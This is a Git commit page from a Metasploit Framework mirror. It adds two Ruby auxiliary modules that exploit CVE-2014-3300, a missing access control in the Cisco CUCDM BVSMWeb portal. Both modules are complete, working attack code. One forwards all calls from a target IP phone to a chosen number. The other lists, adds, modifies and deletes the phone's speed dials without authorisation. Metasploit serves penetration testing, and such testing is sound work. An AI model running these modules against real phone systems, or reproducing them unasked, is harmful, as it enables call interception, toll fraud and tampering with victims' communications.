infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4065, @fozavci's Cisco CUCDM auxiliary modules

bug/bundler_fix
jvazquez-r7 2015-01-10 01:11:45 -06:00
parent bedbffa377 05d364180b
commit 49f04faf3f
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 353 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

148
modules/auxiliary/voip/cisco_cucdm_call_forward.rb Normal file
View File

@ -0,0 +1,148 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
'Description' => %q{
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM) 10 does not properly implement access control, which allows remote attackers to
modify user information. This module exploits the vulnerability for configure unauthorized
call forwarding.
},
'Author' => 'fozavci',
'References' =>
[
['CVE', '2014-3300'],
['BID', '68331']
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
],
'DefaultAction' => 'Info'
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
], self.class)
end
def run
case action.name.upcase
when 'INFO'
get_info
when 'FORWARD'
forward_calls
end
end
def get_info
uri = normalize_uri(target_uri.to_s)
mac = datastore["MAC"]
print_status("#{peer} - Getting fintnumbers and display names of the IP phone")
res = send_request_cgi(
{
'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
'method' => 'GET',
'vars_get' => {
'device' => "SEP#{mac}"
}
})
unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
print_error("#{peer} - Target appears not vulnerable!")
print_status("#{res}")
return []
end
doc = REXML::Document.new(res.body)
lines = []
fint_numbers = []
list = doc.root.get_elements('MenuItem')
list.each do |lst|
xlist = lst.get_elements('Name')
xlist.each {|l| lines << "#{l[0]}"}
xlist = lst.get_elements('URL')
xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
end
lines.size.times do |i|
print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
end
fint_numbers
end
def forward_calls
# for a specific FINTNUMBER redirection
uri = normalize_uri(target_uri.to_s)
forward_to = datastore["FORWARDTO"]
mac = datastore["MAC"]
if datastore['FINTNUMBER']
fint_numbers = [datastore['FINTNUMBER']]
else
fint_numbers = get_info
end
if fint_numbers.empty?
print_error("#{peer} - FINTNUMBER required to forward calls")
return
end
fint_numbers.each do |fintnumber|
print_status("#{peer} - Sending call forward request for #{fintnumber}")
send_request_cgi(
{
'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
'method' => 'GET',
'vars_get' => {
'cfoption' => 'CallForwardAll',
'device' => "SEP#{mac}",
'ProviderName' => 'NULL',
'fintnumber' => "#{fintnumber}",
'telno1' => "#{forward_to}"
}
})
res = send_request_cgi(
{
'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
'method' => 'GET',
'vars_get' => {
'device' => "SEP#{mac}",
'fintnumber' => "#{fintnumber}"
}
})
if res && res.body && res.body && res.body.to_s =~ /CFA/
print_good("#{peer} - Call forwarded successfully for #{fintnumber}")
else
print_status("#{peer} - Call forward failed.")
end
end
end
end

205
modules/auxiliary/voip/cisco_cucdm_speed_dials.rb Normal file
View File

@ -0,0 +1,205 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
'Description' => %q{
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
(CDM), before version 10, doesn't implement access control properly, which allows remote
attackers to modify user information. This module exploits the vulnerability to make
unauthorized speeddial manipulations.
},
'Author' => 'fozavci',
'References' =>
[
['CVE', '2014-3300'],
['BID', '68331']
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
],
'DefaultAction' => 'List'
))
register_options(
[
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
], self.class)
end
def run
case action.name.upcase
when 'MODIFY'
modify
when 'DELETE'
delete
when 'ADD'
add
when 'LIST'
list
end
end
def send_rcv(uri, vars_get)
uri = normalize_uri(target_uri.to_s, uri.to_s)
res = send_request_cgi(
{
'uri' => uri,
'method' => 'GET',
'vars_get' => vars_get
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
return Exploit::CheckCode::Vulnerable, res
else
print_error("#{peer} - Target appears not vulnerable!")
return Exploit::CheckCode::Safe, res
end
end
def parse(res)
doc = REXML::Document.new(res.body)
names = []
phones = []
list = doc.root.get_elements('DirectoryEntry')
list.each do |lst|
xlist = lst.get_elements('Name')
xlist.each {|l| names << "#{l[0]}"}
xlist = lst.get_elements('Telephone')
xlist.each {|l| phones << "#{l[0]}" }
end
if names.size > 0
names.size.times do |i|
info = ''
info << "Position: #{names[i].split(":")[0]}, "
info << "Name: #{names[i].split(":")[1]}, "
info << "Telephone: #{phones[i]}"
print_good("#{peer} - #{info}")
end
else
print_status("#{peer} - No Speed Dial detected")
end
end
def list
mac = datastore['MAC']
print_status("#{peer} - Getting Speed Dials of the IP phone")
vars_get = {
'device' => "SEP#{mac}"
}
status, res = send_rcv('speeddials.cgi', vars_get)
parse(res) unless status == Exploit::CheckCode::Safe
end
def add
mac = datastore['MAC']
name = datastore['NAME']
position = datastore['POSITION']
telno = datastore['TELNO']
print_status("#{peer} - Adding Speed Dial to the IP phone")
vars_get = {
'name' => "#{name}",
'telno' => "#{telno}",
'device' => "SEP#{mac}",
'entry' => "#{position}",
'mac' => "#{mac}"
}
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
print_good("#{peer} - Speed Dial #{position} is added successfully")
elsif res && res.body && res.body.to_s =~ /exist/
print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
else
print_error("#{peer} - Speed Dial couldn't add!")
end
end
def delete
mac = datastore['MAC']
position = datastore['POSITION']
print_status("#{peer} - Deleting Speed Dial of the IP phone")
vars_get = {
'entry' => "#{position}",
'device' => "SEP#{mac}"
}
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
print_good("#{peer} - Speed Dial #{position} is deleted successfully")
else
print_error("#{peer} - Speed Dial is not found!")
end
end
def modify
mac = datastore['MAC']
name = datastore['NAME']
position = datastore['POSITION']
telno = datastore['TELNO']
print_status("#{peer} - Deleting Speed Dial of the IP phone")
vars_get = {
'entry' => "#{position}",
'device' => "SEP#{mac}"
}
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
print_good("#{peer} - Speed Dial #{position} is deleted successfully")
print_status("#{peer} - Adding Speed Dial to the IP phone")
vars_get = {
'name' => "#{name}",
'telno' => "#{telno}",
'device' => "SEP#{mac}",
'entry' => "#{position}",
'mac' => "#{mac}"
}
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
print_good("#{peer} - Speed Dial #{position} is added successfully")
elsif res && res.body =~ /exist/
print_error("#{peer} - Speed Dial is exist, change the position or choose modify!")
else
print_error("#{peer} - Speed Dial couldn't add!")
end
else
print_error("#{peer} - Speed Dial is not found!")
end
end
end